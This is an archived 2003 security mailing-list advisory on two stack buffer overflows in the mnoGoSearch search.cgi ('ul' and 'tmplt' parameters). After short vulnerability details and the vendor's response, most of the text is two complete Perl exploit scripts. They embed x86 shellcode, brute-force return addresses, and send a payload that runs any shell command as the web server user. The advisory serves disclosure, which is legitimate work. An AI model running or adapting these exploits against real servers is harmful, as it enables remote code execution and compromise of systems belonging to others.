[NEWS] mnoGoSearch Vulnerable to a Buffer Overflow Vulnerability (ul, tmplt)
From: SecuriTeam (support_at_securiteam.com)
Date: 06/11/03
- Previous message: SecuriTeam: "[UNIX] Java Virtual Machine Symlink Vulnerability (jpsock)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 11 Jun 2003 19:09:29 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Latest attack techniques.
You're a pen tester, but is google.com still your R&D team?
Now you can get trustworthy commercial-grade exploits and the latest
techniques from a world-class research group.
Learn more at http://www.coresecurity.com/promos/sit_e1,
or call 617-399-6980
- - - - - - - - -
mnoGoSearch Vulnerable to a Buffer Overflow Vulnerability (ul, tmplt)
------------------------------------------------------------------------
SUMMARY
<http://www.mnogosearch.org/> mnoGoSearch is a full-featured SQL based
web search engine, two vulnerabilities in the product allow attackers to
cause the product to overflow two of its internal buffers, causing the
program to crash, possibly execute arbitrary code.
DETAILS
Vulnerable systems:
* mnoGoSearch version 3.1.20
* mnoGoSearch version 3.2.10
Overflow in "ul" parameter:
The "ul" variable is used to specify search result to specific URL. By
supplying crafted "ul" variable more than 5000 user can write arbitrary
address and run command as web server user.
Example:
http://blablabla.com/cgi-bin/search.cgi?ul=[6000]A`s
Overflow in "tmplt" parameter:
User can crash search.cgi by supplying "tmplt" variable over 1024
character. This is stack based buffer overflow where the EIP is easily
overwritten.
Example:
http://blablabla.com/cgi-bin/search.cgi?tmplt=[1050]A`s
Vendor response:
Vendor has been contacted on 01/06/2003 and fix is available from CVS at
<http://www.mnogosearch.org> http://www.mnogosearch.org.
Exploits:
Exploit for ul overflow:
#!/usr/bin/perl
#
# [ reloaded ]
# mencari_sebuah_nama.pl v2.0
# mnogosearch 3.1.x (http://www.mnogosearch.org) exploit for linux ix86
# by pokleyzz of d'scan clanz (05-2003)
#
# Greet:
# tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt,
# kerengge_kurus, b0iler and d'scan clanz.
#
# Shout to:
# #mybsd, #mylinux, #vuln
#
# Special thanks:
# Skywizard of mybsd
#
#
----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you
think
# this stuff is worth it, you can buy me a "teh tarik" in return.
#
----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
#
use IO::Socket;
$host = "127.0.0.1";
$cmd = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;
my $conn;
if ($ARGV[0]){
$host = $ARGV[0];
}
else {
print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz of
d' scan clanz\n\n";
print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port]
[suff] [ret]\n";
print "\thost\thostname to exploit\n";
print "\tcommand\tcommand to execute on server\n";
print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
print "\tport\tport to connect to\n";
print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is
0)\n";
print "\tret\treturn address default bfffd0d0\n";
exit;
}
if ($ARGV[1]){
$cmd = $ARGV[1];
}
if ($ARGV[2]){
$searchpath = $ARGV[2];
}
if ($ARGV[3]){
$port = int($ARGV[3]);
}
if ($ARGV[4]){
$suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
$rawret = hex_to_int($ARGV[5]);
}
######### <http://foldoc.doc.ic.ac.uk/foldoc/foldoc.cgi?query= start
function > start function #########
sub hex_to_int {
my $hs = $_[0];
$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) +
(hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
}
sub int_to_hex {
my $in = $_[0];
$hex = sprintf "%x",$in;
}
sub string_to_ret {
my $rawret = $_[0];
if (length($rawret) != 8){
print $rawret;
die "[*] incorrect return address ...\n ";
} else {
$ret = chr(hex(substr($rawret, 2, 2)));
$ret .= chr(hex(substr($rawret, 0, 2)));
$ret .= chr(hex(substr($rawret, 6, 2)));
$ret .= chr(hex(substr($rawret, 4, 2)));
}
}
sub connect_to {
#print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
}
sub check_version {
my $result;
connect_to();
print "[x] Check if $host use correct version ...\n";
print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost:
$host\nConnection: Close\n\n";
# capture result
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
if ($result =~ /_test_/){
print "[x] Correct version detected .. possibly vulnerable ...\n";
} else {
print $result;
die "[x] New version or wrong url\n";
}
}
sub exploit {
my $rw = $_[0];
$result = "";
# linux ix86 shellcode rip from phx.c by proton
$shellcode =
"\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
"\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
"\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
."\x41\x41"
."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
."$cmd"
."@";
$strret = int_to_hex($rw);
$ret = string_to_ret($strret);
$envvar = 'B' x (4096 - length($shellcode));
$envvar .= $shellcode;
# generate query string
$buffer = "B" x $suffsize;
$buffer .= "B" x 4800;
$buffer .= $ret x 200;
$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
."Accept: $envvar\n"
."Accept-Language: $envvar\n"
."Accept-Encoding: $envvar\n"
."User-Agent: Mozilla/4.0\n"
."Host: $host\n"
."Connection: Close\n\n";
&connect_to;
print "[x] Sending exploit code ..\n";
print "[x] ret: $strret\n";
print "[x] suf: $suffsize\n";
print "[x] length:",length($request),"\n";
print $conn "$request";
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
}
sub check_result {
if ($result =~ /hello/ && !($result =~ /text\/html/)){
print $result;
$success = 1;
} else {
print $result;
print "[*] Failed ...\n";
$success = 0;
}
}
######### <http://foldoc.doc.ic.ac.uk/foldoc/foldoc.cgi?query= end
function > end function #########
&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
&exploit($rawret);
&check_result;
if ($success == 1){
exit;
}
sleep 1;
}
# generate shellcode
Exploit for tmplt overflow:
#!/usr/bin/perl
#
# mnogosearch 3.2.x exploit for linux ix86
# by pokleyzz and s0cket370 of d'scan clanz
#
# Greet:
# tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus
and d'scan clan.
#
# Special thanks:
# Skywizard of mybsd
#
#
#
----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you
think
# this stuff is worth it, you can buy me a "teh tarik" in return.
#
----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
use IO::Socket;
my $host = "127.0.0.1";
my $port = 80;
my $searchpath = "/cgi-bin/search.cgi";
my $envsize = 4096;
my $suffsize = 3;
my $rawret = "bfffd666";
my $ret;
my $cmd = "ls -l";
my $conn;
if ($ARGV[0]){
$host = $ARGV[0];
}
else {
print "[x] mnogosearch 3.2.x exploit for linux ix86 \n\tby pokleyzz and
s0cket370 of d' scan clan\n\n";
print "Usage: \n mencari_asal_usul.pl hostname [command ] [path] [port]
[suff] [ret]\n";
print "\t- if not success try to use 0,1 or 2 for suff (default is 3)";
exit;
}
if ($ARGV[1]){
$cmd = $ARGV[1];
}
if ($ARGV[2]){
$searchpath = $ARGV[2];
}
if ($ARGV[3]){
$port = int($ARGV[3]);
}
if ($ARGV[4]){
$suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
$rawret = $ARGV[5];
}
# linux ix86 shellcode rip from phx.c by proton
my $shellcode =
"\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
"\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
"\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
."\x41\x41"
."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
."$cmd"
."@";
sub string_to_ret {
my $rawret = $_[0];
if (length($rawret) != 8){
print $rawret;
die "[*] incorrect return address ...\n ";
} else {
$ret = chr(hex(substr($rawret, 6, 2)));
$ret .= chr(hex(substr($rawret, 4, 2)));
$ret .= chr(hex(substr($rawret, 2, 2)));
$ret .= chr(hex(substr($rawret, 0, 2)));
}
}
sub connect_to {
print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
}
sub check_version {
my $result;
connect_to();
print "[x] Check if $host use correct version ...\n";
print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost:
$host\n\n";
# capture result
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
if ($result =~ /\/test\//){
print "[x] Correct version.. possibly vulnerable ...\n";
} else {
print $result;
die "[x] Old version or wrong url\n";
}
}
# start exploiting ...
sub exploit {
# generate environment variable for http request
$envvar = 'A' x (4096 - length($shellcode));
$envvar .= $shellcode;
# generate query request
$query = 'A' x $suffsize;
$query .= $ret x 258;
# generate request
$request = "GET $searchpath?tmplt=$query HTTP/1.1\n"
."Accept: $envvar\n"
."Accept-Language: $envvar\n"
."Accept-Encoding: $envvar\n"
."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
."Host: $host\n"
."Connection: Close\n\n";
print "[x] Trying to execute command ... \n";
print "[x] Return address : $rawret \n";
print "[x] Suffix size : $suffsize \n";
connect_to();
print $conn "$request";
# capture result
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
if ($result =~ /hello/){
print $result;
} else {
print "[*] Failed ...\n";
}
}
&string_to_ret($rawret);
&check_version;
&exploit;
ADDITIONAL INFORMATION
The information has been provided by
<mailto:pokleyzz@scan-associates.net> pokleyzz.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Java Virtual Machine Symlink Vulnerability (jpsock)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- Re: Using IWin32Window to SetParent
... the error was an overflow that was happening on Handle.ToInt32 ... Int32,
ByVal Parent As Int32) As Int32 ... Friend Overloads Sub Show ... > thing to
do would be to debug the overflow exception. ... (microsoft.public.vsnet.ide) - Re: Overflow
... The problem is that VBA tries to calculate ... > This little sub gives
me a runtime overflow. ... > Sub ebj() ... (microsoft.public.excel.programming) - Re: Error Message different in MDB and MDE
... produced the following error: Overflow. ... And from the Access designer:
... And that additional text DID confuse us: I expect to see that text ... >
Private Sub Detail_Click ... (microsoft.public.access.formscoding) - Re: Error Message different in MDB and MDE
... produced the following error: Overflow. ... And from the Access designer:
... And that additional text DID confuse us: I expect to see that text ... >
Private Sub Detail_Click ... (microsoft.public.access.formscoding) - Re: Error Message different in MDB and MDE
... produced the following error: Overflow. ... And from the Access designer:
... And that additional text DID confuse us: I expect to see that text ... >
Private Sub Detail_Click ... (microsoft.public.access.modulesdaovba)
